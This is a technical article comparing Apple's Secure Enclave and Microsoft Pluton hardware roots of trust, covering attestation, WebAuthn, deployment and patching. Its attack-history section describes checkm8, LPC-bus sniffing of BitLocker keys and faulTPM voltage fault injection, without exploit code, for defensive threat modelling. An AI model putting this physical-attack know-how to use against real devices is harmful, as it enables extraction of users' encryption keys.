&lt;p&gt;A better answer keeps the unforgeability of &quot;this signature came from a real device&quot; and adds an unlinkability property: the signature does not identify &lt;em&gt;which&lt;/em&gt; device, only that it is genuine. This is what cryptographers call anonymous attestation, and the canonical construction is DAA.&lt;/p&gt;

A class of cryptographic protocols that let a hardware token sign messages in a way that proves it belongs to a group of legitimate devices without revealing *which* device. Introduced by Brickell, Camenisch, and Chen in 2004 [@brickell-2004-daa] as part of the TPM 1.2 specification work, with the elliptic-curve variant ECDAA standardized for TPM 2.0. See the Wikipedia overview [@daa-wikipedia] for the protocol skeleton.
&lt;p&gt;The mathematics of DAA rests on group signatures with selective linkability. A device runs the join protocol once with a group issuer (the &quot;Privacy CA&quot; or analogous authority) and receives a credential. It can then prove, via a Camenisch-Lysyanskaya-style signature of knowledge, that it holds such a credential without revealing which one. With ECDAA, the join and signing operations are roughly the cost of a couple of elliptic-curve multiplications.&lt;/p&gt;
&lt;p&gt;The privacy property comes with caveats. Verifiers can opt into &quot;basename&quot; linkability, where signatures from the same device addressed to the same service are linkable -- letting a service recognise a returning user without letting it correlate across services. The math has been deployed in TPM 2.0 since the 2014 spec.&lt;/p&gt;
&lt;h3&gt;6.2 The Microsoft path: TPM 2.0 attestation plus Microsoft-rooted services&lt;/h3&gt;
&lt;p&gt;Pluton inherits TPM 2.0&apos;s attestation primitives. The standard flow:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Generate an Attestation Key (AK) inside the TPM, with a private half that never leaves.&lt;/li&gt;
&lt;li&gt;Certify the AK to a Privacy CA (or via ECDAA) using the Endorsement Key.&lt;/li&gt;
&lt;li&gt;Hash the boot configuration into Platform Configuration Registers (PCRs) during measured boot.&lt;/li&gt;
&lt;li&gt;Have the relying party send a fresh nonce.&lt;/li&gt;
&lt;li&gt;Issue &lt;code&gt;TPM2_Quote(AK, PCR_mask, qualifying_data=nonce)&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Send the quote, the AK certificate, and the boot event log to the relying party.&lt;/li&gt;
&lt;li&gt;The relying party replays the event log, checks that the replayed PCRs match the quoted ones, validates the AK certificate chain, and validates the signature.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;attest(nonce, pcr_mask):
    AK = TPM2_Create(parent=EK, type=signing)
    AK_cert = privacy_CA.certify(AK_pub, EK_cert)    # or ECDAA group sig
    quote = TPM2_Quote(AK, pcr_mask, qualifying_data=nonce)
    return (quote, AK_cert, event_log)

verify(quote, AK_cert, event_log, expected_pcrs):
    assert privacy_CA.verify(AK_cert)
    assert ECDSA_verify(AK_cert.pub, quote.sig, quote.body)
    assert quote.qualifying_data == nonce
    assert replay_log(event_log) == quote.pcrs == expected_pcrs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That covers raw TPM 2.0. Microsoft layers on top a service called &lt;strong&gt;Device Health Attestation&lt;/strong&gt; that does the verifier work as a cloud service, supplying Reference Integrity Manifests for known-good Microsoft-signed boot states. Microsoft Entra ID conditional access policies can then refuse sign-in to devices whose Pluton-signed health attestation does not match an expected baseline (Microsoft Pluton Security Processor, Microsoft Learn [@ms-pluton-learn]).The interesting privacy property here is that ECDAA-grade unlinkability is &lt;em&gt;available&lt;/em&gt; through TPM 2.0, but Microsoft&apos;s deployed services tend to use Privacy-CA-style flows where the AK certificate is well-defined and reusable. Whether a given Microsoft attestation flow is anonymous-unlinkable or pseudonymous-linkable is a per-service detail rather than a platform property.&lt;/p&gt;
&lt;h3&gt;6.3 The Apple path: rooted in Apple&apos;s CA, scoped per app&lt;/h3&gt;
&lt;p&gt;Apple&apos;s DeviceCheck and App Attest [@apple-platform-security] take a different approach. App Attest gives each &lt;em&gt;installation of each app&lt;/em&gt; a unique SEP-resident key. The corresponding attestation certificate chains to Apple&apos;s CA. Apps prove integrity to their own back-end servers by having the server send a nonce, the SEP signing the nonce with the per-install key, and Apple&apos;s CA chain validating that the key was issued on a genuine Apple device.&lt;/p&gt;
&lt;p&gt;The privacy property is scoped differently from DAA. The key is per-installation, which means uninstalling and reinstalling the app generates a new key with no link to the old one. Across different apps on the same device, the keys are independent -- so two apps cannot collude with their respective back-ends to detect they are on the same phone. The trade-off: there is no formal anonymity within a group; the key is identifiable to its single installation, but that installation is fresh each install.&lt;/p&gt;
&lt;p&gt;DeviceCheck is older and weaker. It gives an app a two-bit value the developer can set per device, retrievable on future runs. It is fraud-signal infrastructure, not cryptographic proof.&lt;/p&gt;

DAA is a group-signature scheme; Apple&apos;s App Attest is a per-installation public-key scheme certified by Apple. They are not the same primitive. DAA gives &quot;I am in this group of devices&quot; without revealing which device. App Attest gives &quot;I am this specific installation, and Apple says it is genuine.&quot; The privacy distinction matters when the threat is correlation across services rather than correlation within a single service.
&lt;h3&gt;6.4 Where the two converge: FIDO2/WebAuthn&lt;/h3&gt;
&lt;p&gt;Both platforms expose their hardware-backed credentials through a single cross-platform standard: FIDO2/WebAuthn. When a browser asks &quot;create a credential bound to this origin, hardware-resident if possible,&quot; the underlying operating system asks SEP or Pluton to generate the key. The resulting public-key credential, signed by the device&apos;s attestation key, is what the relying party verifies (FIDO Alliance [@fido-alliance]).&lt;/p&gt;

sequenceDiagram
    participant Browser
    participant OS as OS Authenticator
    participant HW as SEP or Pluton
    participant RP as Relying Party
    RP-&amp;gt;&amp;gt;Browser: Challenge nonce, RP ID
    Browser-&amp;gt;&amp;gt;OS: navigator.credentials.create()
    OS-&amp;gt;&amp;gt;HW: Generate key bound to RP ID + user gesture
    HW--&amp;gt;&amp;gt;OS: Public key + attestation
    OS--&amp;gt;&amp;gt;Browser: Public key + signed attestation
    Browser-&amp;gt;&amp;gt;RP: Registration response
    Note over RP: Stores public key
    RP-&amp;gt;&amp;gt;Browser: Authentication challenge
    Browser-&amp;gt;&amp;gt;OS: navigator.credentials.get()
    OS-&amp;gt;&amp;gt;HW: Sign challenge (user gesture)
    HW--&amp;gt;&amp;gt;OS: Signature
    OS--&amp;gt;&amp;gt;Browser: Assertion
    Browser-&amp;gt;&amp;gt;RP: Authentication response
    RP-&amp;gt;&amp;gt;RP: Verify signature with stored pubkey
&lt;p&gt;FIDO2/WebAuthn is the most boring and most important fact about modern hardware roots of trust: from the application&apos;s point of view, you no longer need to know whether you are talking to SEP or Pluton or a discrete TPM. The same JavaScript runs on all of them. We will return to FIDO2 in Section 8.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Attestation is where Apple and Microsoft diverge most sharply on privacy philosophy. Microsoft uses TPM 2.0 with anonymous-group cryptography available but not always deployed. Apple uses per-installation keys rooted at Apple&apos;s CA. FIDO2/WebAuthn is the layer where both meet the developer at the door.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;7. What has actually broken&lt;/h2&gt;
&lt;p&gt;Architecture is a story you tell about a system. Attacks are the system&apos;s reply. Both SEP and Pluton have a public attack history; reading it carefully is the fastest way to understand the real threat model rather than the marketing one.&lt;/p&gt;
&lt;h3&gt;7.1 checkm8 and the unpatchable boot ROM&lt;/h3&gt;
&lt;p&gt;In late 2019, the researcher axi0mX published &lt;code&gt;ipwndfu&lt;/code&gt; [@ipwndfu], an exploit against a use-after-free in the SecureROM USB DFU stack of Apple SoCs from A5 through A11. The advisory carries CVE-2019-8900 [@nvd-checkm8] and CERT/CC VU#941987 [@cert-checkm8]. Because SecureROM is mask ROM -- etched into the silicon, immutable -- Apple cannot patch it. The only mitigation was new silicon. A12 and later are immune; earlier devices are permanently affected.&lt;/p&gt;
&lt;p&gt;What checkm8 buys an attacker is application-processor code execution at boot time, on a device they have physical access to. That is significant. It enables forensically sound extraction tooling -- the Elcomsoft writeup walks through exactly which iPhone models and iOS versions are supported [@elcomsoft-checkm8]. It also covers the Apple T2 chip used in 2018-2020 Intel Macs [@apple-a-series], which is built on the same A10-family silicon.&lt;/p&gt;
&lt;p&gt;But checkm8 does not, by itself, break SEP secrets. The SEP is still gated by the device passcode and the data-protection class keys. An attacker with checkm8 can run code on the AP, but they still need the passcode to unlock the user&apos;s protected data (CERT/CC VU#941987 [@cert-checkm8]). The forensic value of checkm8 comes from being able to brute-force passcodes more effectively, capture keyboard state, and access classes of data not bound to a passcode -- not from extracting SEP-held keys directly.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If your organization still has 2018-2020 Intel Macs (T2-bearing) in service, they remain physical-access-attackable. The exploit is mature, the tooling is public, and the silicon will never be patched. For high-value users, retire T2 hardware in favor of Apple Silicon Macs (M1 and later, which use A14-derived SoCs immune to checkm8) (Elcomsoft: using checkm8 [@elcomsoft-checkm8]).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Pangu team&apos;s &quot;Blackbird&quot; SEPROM exploit, presented at MOSEC 2019, reportedly compromised SEPROM on A10/A10X devices. Apple has not published a detailed advisory for that work and the original presentation materials are not in the verified-sources list, so we mention it only by way of acknowledging that even SEP boot ROMs have a finite security lifetime. The architectural point stands: any unpatchable ROM becomes a permanent liability when a bug is found in it.&lt;/p&gt;
&lt;h3&gt;7.2 LPC sniffing and discrete TPMs&lt;/h3&gt;
&lt;p&gt;We opened with this attack and it deserves a second pass in the context of Pluton&apos;s design. The Pulse Security writeup [@pulse-tpm-sniff] demonstrates extraction of the BitLocker Volume Master Key from a Microsoft Surface Pro 3 (TPM 2.0) and a Lenovo laptop (TPM 1.2) using a $40 FPGA on the LPC bus. The attack requires physical access for under an hour and modest soldering skill.&lt;/p&gt;
&lt;p&gt;This is the textbook case where Pluton is structurally better than discrete TPMs: there is no external bus to sniff because the security subsystem lives on the SoC die. The same attack against a Pluton-enabled CPU is not just hard, it is geometrically impossible. There is no bus to attach probes to.&lt;/p&gt;
&lt;p&gt;That is not the same as &quot;Pluton is unattackable&quot; -- it just means this specific attack class is closed.&lt;/p&gt;
&lt;h3&gt;7.3 faulTPM and the AMD PSP&lt;/h3&gt;
&lt;p&gt;The most consequential publication on Pluton-adjacent silicon is Werling, Buhren, Jacob, and Seifert&apos;s 2023 USENIX WOOT paper &quot;faulTPM&quot; [@faultpm]. The attack: voltage fault injection against AMD&apos;s Platform Security Processor (PSP), the TEE on which AMD&apos;s fTPM runs, on Zen 2 and Zen 3 CPUs. The result: full extraction of the fTPM key derivation seed. With that seed, the attackers decrypted all sealed objects regardless of PCR policy or anti-hammering, and recovered the BitLocker VMK on a Lenovo Ideapad. The reproducible attack code is PSPReverse/ftpm_attack on GitHub [@faultpm-repo].&lt;/p&gt;
&lt;p&gt;Several careful observations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;The published attack targets non-Pluton AMD fTPM.&lt;/strong&gt; Pluton-on-AMD is a separate code path; faulTPM as published does not directly extract Pluton state.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pluton-on-AMD runs in the PSP environment.&lt;/strong&gt; The underlying TEE that faulTPM compromises is the same TEE Pluton-on-AMD rides on. Whether the additional hardening Pluton adds is sufficient to defeat fault injection at the PSP level is an open empirical question.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;There is no published voltage-glitch attack against Microsoft Pluton specifically as of May 2026&lt;/strong&gt; in the verified sources surveyed. Absence of evidence is not evidence of absence; serious researchers are reportedly working on it.&lt;/li&gt;
&lt;/ul&gt;

A physical attack class in which the attacker briefly reduces or perturbs the supply voltage to a target chip at a precisely timed moment, causing it to mis-execute an instruction in a controlled way. With sufficient practice, VFI can be used to skip authentication checks, leak intermediate values, or corrupt key derivation. Defenses include redundant voltage sensors, double-execution of sensitive operations, and physically separating the voltage domain of the security subsystem -- mitigations Apple alludes to for SEP and Microsoft alludes to for Pluton, but neither vendor publishes a complete defensive model.

If your adversary is a state-level laboratory with \$50K of equipment and a few hours of physical access, no commodity hardware root of trust on the market today is fully resistant to fault injection. The realistic question is &quot;how much does extracting the key cost, and is that cost above the value of what is protected?&quot; For consumer threat models, faulTPM is exotic; for high-value enterprise or dissident use cases, it is in scope.
&lt;h3&gt;7.4 What is &lt;em&gt;not&lt;/em&gt; known to be broken&lt;/h3&gt;
&lt;p&gt;Modern SEP (A14+/M-series) has no publicly disclosed extraction attack as of the May 2026 verified sources reviewed. The combination of dedicated core, MPE with anti-replay, lower clock, and SSC-backed replay protection has held up. This is consistent with -- but does not prove -- the architectural claim that the dedicated-core design closes the side-channel and co-execution attack surface.&lt;/p&gt;
&lt;p&gt;Pluton with the 2024+ Rust firmware foundation has no publicly disclosed direct extraction attack. The faulTPM family of attacks remains an open concern at the PSP layer; the LPC bus class is closed by design; firmware bugs are reduced (not eliminated) by the move to memory-safe code.&lt;/p&gt;

flowchart TD
    A[&quot;Attack class&quot;] --&amp;gt; B{&quot;Discrete TPM&quot;}
    A --&amp;gt; C{&quot;AMD fTPM&quot;}
    A --&amp;gt; D{&quot;Pluton&quot;}
    A --&amp;gt; E{&quot;Apple SEP A14+&quot;}
    B --&amp;gt; B1[&quot;LPC sniffing: yes (Pulse Security)&quot;]
    B --&amp;gt; B2[&quot;Firmware bug: rare patches&quot;]
    C --&amp;gt; C1[&quot;faulTPM: full extraction&quot;]
    C --&amp;gt; C2[&quot;Patches: BIOS only&quot;]
    D --&amp;gt; D1[&quot;LPC sniffing: not applicable&quot;]
    D --&amp;gt; D2[&quot;faulTPM-like on PSP: open&quot;]
    D --&amp;gt; D3[&quot;Patches: Windows Update + capsule&quot;]
    E --&amp;gt; E1[&quot;checkm8 on A5-A11: AP code exec&quot;]
    E --&amp;gt; E2[&quot;Direct SEP extraction A14+: none public&quot;]
    E --&amp;gt; E3[&quot;Patches: iOS/macOS update, mask ROM never&quot;]
&lt;p&gt;The honest summary is that as you move from discrete TPMs to fTPMs to Pluton to SEP, the attack surface shrinks but the residual attacks get more expensive rather than disappearing. The faulTPM line is still the academic state of the art in showing this.&lt;/p&gt;
&lt;h2&gt;8. Cross-platform standards: the layer where the divide gets papered over&lt;/h2&gt;
&lt;p&gt;If you are a web developer in 2026 and a user asks &quot;how do I sign into your site with my Touch ID or my Windows Hello fingerprint?&quot; the answer is the same in either case: WebAuthn. The standard does not care which hardware root of trust the OS happens to expose underneath.&lt;/p&gt;
&lt;h3&gt;8.1 FIDO2/WebAuthn as the lingua franca&lt;/h3&gt;
&lt;p&gt;The FIDO Alliance [@fido-alliance] defines the protocols. WebAuthn is the W3C JavaScript API; CTAP (Client to Authenticator Protocol) is the underlying transport between the browser/OS and the authenticator. The authenticator can be a USB security key, a phone, a built-in platform authenticator backed by SEP or Pluton, or something else entirely. The relying party sees the same registration and authentication ceremony in all cases.&lt;/p&gt;
&lt;p&gt;The handful of properties WebAuthn guarantees -- origin binding, user gesture, fresh signature per challenge -- are independent of the silicon underneath. The handful of properties it does &lt;em&gt;not&lt;/em&gt; try to guarantee -- &quot;is this device freshly compromised by a kernel rootkit&quot; -- are not fixable at the protocol layer either; that is what attestation extensions are for.&lt;/p&gt;
&lt;h3&gt;8.2 Where attestation extensions vary&lt;/h3&gt;
&lt;p&gt;WebAuthn defines optional attestation extensions that let a relying party request a hardware-backed proof that the authenticator is genuine. Apple&apos;s attestation through WebAuthn rides on App Attest infrastructure; Microsoft&apos;s rides on TPM 2.0 attestation. The receipts differ in format and certificate chain, but the higher-level question &quot;does the public key come from genuine hardware&quot; gets answered on both platforms.&lt;/p&gt;
&lt;p&gt;For most relying parties, the cross-platform truth is simpler than the underlying mechanics: ask for a hardware-backed credential, accept the WebAuthn response, validate the signature, and let the platform handle what kind of silicon was involved.&lt;/p&gt;

WebAuthn looks like it should be the climax of the article. From an architecture perspective, it is the anticlimax. The whole point is that, at the application layer, SEP and Pluton are interchangeable. That is what the standard is for. The differences resurface only when you care about device-class attestation or about the privacy property of the attestation key -- both of which are extension-level concerns rather than core-protocol concerns.
&lt;h3&gt;8.3 TPM 2.0 as the other lingua franca&lt;/h3&gt;
&lt;p&gt;TPM 2.0 itself plays this role in non-web contexts. Enterprise tools that need to attest a device&apos;s boot state -- Microsoft Entra ID conditional access, MDM compliance evaluators, Linux remote attestation frameworks -- speak TPM 2.0. Pluton exposes the TPM 2.0 wire protocol, so these tools work unchanged (Microsoft Pluton as TPM, Microsoft Learn [@ms-pluton-as-tpm]).&lt;/p&gt;
&lt;p&gt;Linux on Apple Silicon (Asahi) currently cannot use SEP for analogous attestation; Apple does not expose the SEP to non-Apple operating systems, and there is no TPM 2.0 emulation. This is a real gap for users who want Apple hardware with a non-Apple OS.&lt;/p&gt;
&lt;h3&gt;8.4 The Android third corner&lt;/h3&gt;
&lt;p&gt;This article is about Apple vs Microsoft, but a complete picture must mention that Android has its own hardware root of trust story rooted in Trusty/TEE-style designs on ARM TrustZone plus discrete StrongBox elements on Pixel-class hardware. Cross-platform mobile development frequently abstracts SEP and Android StrongBox under a common interface (e.g., React Native&apos;s keychain modules), and the privacy and attestation properties of the two systems are not identical but rhyme. Google Play Integrity API plays the role App Attest plays on iOS.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; At the application layer, the right question is not &quot;SEP or Pluton&quot; but &quot;are you using WebAuthn or TPM 2.0 or App Attest at the right point in the trust path.&quot; The platform-specific differences sit beneath those interfaces, and the standards are explicitly designed to be the place developers can stop caring.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;9. Deployment dynamics: who ships what, where, when&lt;/h2&gt;
&lt;p&gt;The two industries have different shapes, and that shapes the deployment story.&lt;/p&gt;
&lt;h3&gt;9.1 Apple: vertical integration, total reach&lt;/h3&gt;
&lt;p&gt;Every shipping Apple device since the iPhone 5s contains a SEP, by virtue of every shipping Apple SoC containing one. That includes (Apple Platform Security: Secure Enclave [@apple-sep-chapter]):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;iPhone 5s and later (A7+)&lt;/li&gt;
&lt;li&gt;iPad Air and later&lt;/li&gt;
&lt;li&gt;Apple Watch Series 1 and later&lt;/li&gt;
&lt;li&gt;Apple TV HD and later&lt;/li&gt;
&lt;li&gt;HomePod and HomePod mini&lt;/li&gt;
&lt;li&gt;Apple Vision Pro&lt;/li&gt;
&lt;li&gt;All Apple Silicon Macs (M1, M2, M3, M4 families)&lt;/li&gt;
&lt;li&gt;All Intel Macs from 2018 to 2020 (via the T2 chip)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is no SKU differentiation. There is no &quot;Pro vs Air&quot; split on whether security hardware is present. You buy a current-generation Apple device, you get the SEP. This is the upside of vertical integration: deployment by default.&lt;/p&gt;
&lt;p&gt;The downside is that nothing else gets the SEP. Linux on Apple Silicon -- the Asahi Linux project -- cannot use the SEP for keychain operations, FileVault wrapping, or attestation. Apple does not expose the SEP outside of macOS, iOS, iPadOS, watchOS, tvOS, and visionOS. The hardware is universal in Apple&apos;s product line and absent everywhere else.&lt;/p&gt;
&lt;h3&gt;9.2 Microsoft: open multivendor, opt-in adoption&lt;/h3&gt;
&lt;p&gt;Pluton ships in silicon Microsoft does not make. That changes the deployment story in two ways:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Vendor availability&lt;/strong&gt;. As of the current Microsoft documentation [@ms-pluton-learn], Pluton is present in AMD Ryzen 6000 and later, Intel Core Ultra Series 2 and later, and Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series. Anything older still uses discrete TPM 2.0 or vendor fTPM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OEM enablement&lt;/strong&gt;. The chip can be physically present and disabled in UEFI. Microsoft has been pushing OEMs to ship Pluton enabled by default on Copilot+ PCs, but the universe of laptops is heterogeneous, and the practitioner answer is &quot;check &lt;code&gt;tpm.msc&lt;/code&gt; to see what manufacturer ID is reported.&quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Default-enabled-on-shipping-hardware is documented for Surface Laptop 7 and Surface Pro 11 Copilot+ PCs. Various Lenovo ThinkPad Z, Dell Latitude, and HP EliteBook configurations follow (Microsoft Pluton Security Processor, Microsoft Learn [@ms-pluton-learn]). On other devices Pluton may be present but disabled in firmware, falling back to discrete TPM or vendor fTPM.This is a deployment claim that ages quickly. The shipping matrix shifts every six to twelve months as new SoCs come to market and OEMs rev their UEFI defaults. The verification workflow is the same regardless: &lt;code&gt;Get-PnpDevice&lt;/code&gt; and &lt;code&gt;tpm.msc&lt;/code&gt; on the actual hardware tell you what is active.&lt;/p&gt;
&lt;h3&gt;9.3 The patch-channel difference, made concrete&lt;/h3&gt;
&lt;p&gt;Apple ships SEP firmware inside its OS update. When the user installs iOS 19.4 or macOS 16.2, the bundle includes a new sepOS image; the device verifies and loads it during the next boot (Apple Platform Security [@apple-platform-security]).&lt;/p&gt;
&lt;p&gt;Microsoft ships Pluton firmware through Windows Update and UEFI capsules. The OS-driven path lets Microsoft push a firmware refresh to billions of machines without OEM cooperation. The capsule path covers the case where the firmware is needed during early boot before Windows itself is in control.&lt;/p&gt;
&lt;p&gt;Discrete TPMs occupy the third position: firmware updates exist but require an OEM-issued utility that few users ever run. This is why most enterprise TPMs in the field run firmware from 2020 or earlier.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A serious bug in a discrete TPM chip is, in practice, never fully fixed because the patch never reaches the bulk of deployed devices. A serious bug in Pluton can be patched globally inside a Patch Tuesday cycle. A serious bug in SEP can be patched globally inside an iOS/macOS minor release. The same bug class produces three different incident-response time scales.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.4 The economic and political layer&lt;/h3&gt;
&lt;p&gt;Apple controls every step from sand to support page. The benefit is consistency. The cost is that Apple decides what the SEP can and cannot do, with no externally visible audit, and the customer cannot verify the firmware. For the Apple-customer market, that has not been a deal-breaker.&lt;/p&gt;
&lt;p&gt;Microsoft controls the Pluton firmware. The benefit is that one team&apos;s engineering effort propagates across three silicon vendors and thousands of OEM SKUs. The cost is that the OS update channel and the security update channel collapse into one Microsoft-controlled flow. Critics describe this as platform lock-in; supporters describe it as the only way to actually patch the silicon at scale. Both readings have evidence behind them.&lt;/p&gt;

The same patch channel that protects users from unpatched silicon bugs is the patch channel a hypothetical compelled-update scenario would use. There is no commodity product that gives the device owner an independent veto on root-of-trust firmware updates.
&lt;p&gt;This is a real open problem, not a fictional one. The Trusted Computing Group has a notion of &quot;owner-authorized&quot; TPM hierarchies; Azure Sphere uses a three-key model in which device owner, vendor, and Microsoft all hold signing capabilities for different scopes. Nothing in the commodity consumer space has yet shipped a model where the device owner can veto a vendor-signed firmware update on the security subsystem.&lt;/p&gt;
&lt;h2&gt;10. Where this goes next&lt;/h2&gt;
&lt;p&gt;The honest answer is that the immediate future is more of the same with three new pressures.&lt;/p&gt;
&lt;h3&gt;10.1 Post-quantum migration&lt;/h3&gt;
&lt;p&gt;The cryptographic primitives currently rooted in both platforms -- ECDSA P-256 in the SEP, RSA-2048 and ECDSA in TPM 2.0 -- are not post-quantum-safe. NIST standardized ML-KEM and ML-DSA in FIPS 203 and FIPS 204 in 2024 (the NIST publication URLs are outside our verified-source set, so this paragraph states the timeline at the policy level only). Migrating &lt;em&gt;hardware-fused&lt;/em&gt; attestation roots to post-quantum schemes is genuinely hard because the silicon-burned UID-equivalent keys are baked at fabrication time and cannot easily be replaced.&lt;/p&gt;
&lt;p&gt;The likely path: hardware retains agility at the wrapping layer (the unique chip key) while the attestation key types evolve. TPM 2.0 already supports algorithm agility in the spec, which is the kind of foresight you only appreciate a decade after it was added. SEP&apos;s key wrapping is bespoke; Apple has not published a PQC migration plan in the verified sources reviewed.&lt;/p&gt;
&lt;p&gt;This is a place where the comparison gets uncertain. Both vendors will need to migrate. Neither has shipped a primary post-quantum-rooted attestation flow in their public 2026 documentation as far as we can verify.&lt;/p&gt;
&lt;h3&gt;10.2 Confidential computing convergence&lt;/h3&gt;
&lt;p&gt;The same silicon technologies that build SEP and Pluton are now powering confidential computing -- AMD SEV-SNP, Intel TDX, ARM CCA. These extend the &quot;untrusted host kernel&quot; threat model from disk encryption and credential storage to entire virtual machines. The trust roots of confidential computing currently live in the same chips&apos; security subsystems: AMD&apos;s PSP holds SEV-SNP attestation keys; Intel&apos;s CSME, working with TDX, holds equivalent keys.&lt;/p&gt;
&lt;p&gt;Pluton-on-Intel and Pluton-on-AMD will likely inherit responsibilities here as Microsoft consolidates more of the security subsystem under the Pluton name. Apple has not publicly signaled equivalent ambitions for SEP on the server -- Apple&apos;s server presence is mostly internal.&lt;/p&gt;
&lt;h3&gt;10.3 The AI agent identity problem&lt;/h3&gt;
&lt;p&gt;This is the next decade&apos;s question. When your laptop runs an autonomous AI agent that signs cloud API requests on your behalf, what attests to &lt;em&gt;the agent&apos;s&lt;/em&gt; identity? The current architectures attest to the device and to user gestures, not to the agent. There is no shipping primitive in either SEP or Pluton that says &quot;this signature came from agent X running on device Y, gated by user policy Z that the user actually consented to.&quot;&lt;/p&gt;
&lt;p&gt;A defensible reading is that both vendors are moving slowly toward agent-bound credentials, but neither has published a clean primitive. This is an open design space. We mark it as a place to watch rather than a place where shipping products have answers.&lt;/p&gt;

There is no shipping commodity hardware root of trust with simultaneously: post-quantum attestation, owner-vetoable updates, independently audited firmware, and agent identity. There may not be one for a decade. The current architectures -- SEP and Pluton -- are the strongest commodity options available, and they are still incomplete relative to the design space.
&lt;h3&gt;10.4 The convergence that probably will not happen&lt;/h3&gt;
&lt;p&gt;People periodically suggest that Apple should expose the SEP via TPM 2.0 for cross-platform compatibility, or that Microsoft should ship a dedicated security core like SEP. Neither is likely. Apple&apos;s value proposition rests on vertical integration; opening the SEP to non-Apple operating systems would dilute it. Microsoft&apos;s value proposition rests on multi-vendor compatibility; mandating a SEP-style dedicated core would fragment their silicon partner relationships.&lt;/p&gt;
&lt;p&gt;The structural diversity is here to stay. FIDO2/WebAuthn and TPM 2.0 are how the two systems will continue to interoperate without converging on a single hardware architecture. That is fine. It is even, arguably, good -- a monoculture would be worse for security than a duopoly with different threat-model trade-offs.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The interesting question for the next decade is not whether Apple or Microsoft picks a different silicon strategy. It is whether the cross-platform standards layer -- WebAuthn, TPM 2.0, FIDO2 -- evolves fast enough to expose new security primitives (post-quantum attestation, agent identity, owner-vetoable updates) before any one vendor ships proprietary equivalents.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;

Pluton presents a TPM 2.0 personality to Windows -- so BitLocker, Windows Hello, Credential Guard, and TPM-aware enterprise tools work unchanged -- but it is also more than a TPM 2.0. It exposes Microsoft-rooted services beyond the TCG spec, accepts firmware updates through Windows Update rather than only OEM utilities, lives on the SoC die rather than the motherboard (closing the LPC sniffing attack class), and -- from 2024 -- runs a Rust-based firmware foundation on AMD and Intel platforms (Microsoft Pluton Security Processor, Microsoft Learn [@ms-pluton-learn]).

Two reasons. First, the SEP was designed before TPM 2.0 became the relevant cross-platform standard for Apple&apos;s product mix; SEP&apos;s API surface is bespoke to Apple&apos;s frameworks (`SecKey`, App Attest, LocalAuthentication, Keychain [@apple-keychain]). Second, exposing the SEP via TPM 2.0 would mean making the SEP usable from non-Apple operating systems on Apple hardware -- which is not how Apple ships its platforms. The SEP&apos;s lack of TPM 2.0 personality is a deliberate product decision, not a technical limitation.

No -- not directly. Checkm8 (CVE-2019-8900) [@nvd-checkm8] exploits the SecureROM USB DFU stack on A5-A11 Apple SoCs and the T2 chip in 2018-2020 Intel Macs, giving an attacker with physical access application-processor code execution at boot. The SEP itself remains gated by the device passcode and the data-protection class keys (CERT/CC VU#941987 [@cert-checkm8]). The forensic value of checkm8 is the ability to mount passcode brute-force more effectively and access classes of data not bound to a passcode, not direct SEP-key extraction.

Yes. The Pulse Security TPM-sniffing attack [@pulse-tpm-sniff] works because the discrete TPM returns the Volume Master Key over an external motherboard bus that an attacker can probe. Pluton lives on the SoC die; there is no external bus to attach probes to. The attack is structurally impossible against Pluton-rooted BitLocker. On laptops with discrete TPMs, the mitigation remains BitLocker with pre-boot PIN or USB key authentication.

The published faulTPM attack [@faultpm] targets AMD&apos;s fTPM running in the AMD Platform Security Processor (PSP) on Zen 2 and Zen 3 CPUs, not Pluton specifically. However, Pluton-on-AMD is implemented atop the same PSP environment, so the underlying TEE is fault-attackable in principle. There is no publicly disclosed Pluton-targeted voltage-glitch attack as of May 2026 in the verified sources reviewed; whether Pluton&apos;s additional hardening blocks the fault-injection class is an open empirical question.

For most purposes, no. FIDO2/WebAuthn [@fido-alliance] hides the difference at the API layer -- the same browser code talks to a SEP-backed credential on iOS/macOS and a Pluton-backed credential on Windows. You care about the difference when you need device-class attestation (Apple&apos;s App Attest vs Microsoft&apos;s Device Health Attestation), when privacy of the attestation key matters (Microsoft offers ECDAA-grade options via TPM 2.0; Apple offers per-installation keys), or when you need to support Linux on Apple Silicon (where neither path is available).

Not in any current shipping commodity product. Apple devices ship SEP and no TPM 2.0; Windows devices ship Pluton, discrete TPM, or vendor fTPM but no SEP. The closest historical case is the Apple T2 chip in 2018-2020 Intel Macs [@apple-a-series]: the Mac ran macOS rooted at the T2 SEP, but if you booted Windows on the same hardware via Boot Camp, the T2 still provided the secure-boot anchor though Windows did not interact with it as a TPM.
&lt;h2&gt;12. Closing observation&lt;/h2&gt;
&lt;p&gt;There is a temptation, when comparing two designs as deeply considered as SEP and Pluton, to declare one the winner. Resist that temptation. The two architectures answer different questions for different markets, and the differences are exactly where each one shines. SEP is what you build when you own the silicon, the OS, and the patch channel. Pluton is what you build when you control the OS and the patch channel but need to ride on three other companies&apos; silicon.&lt;/p&gt;
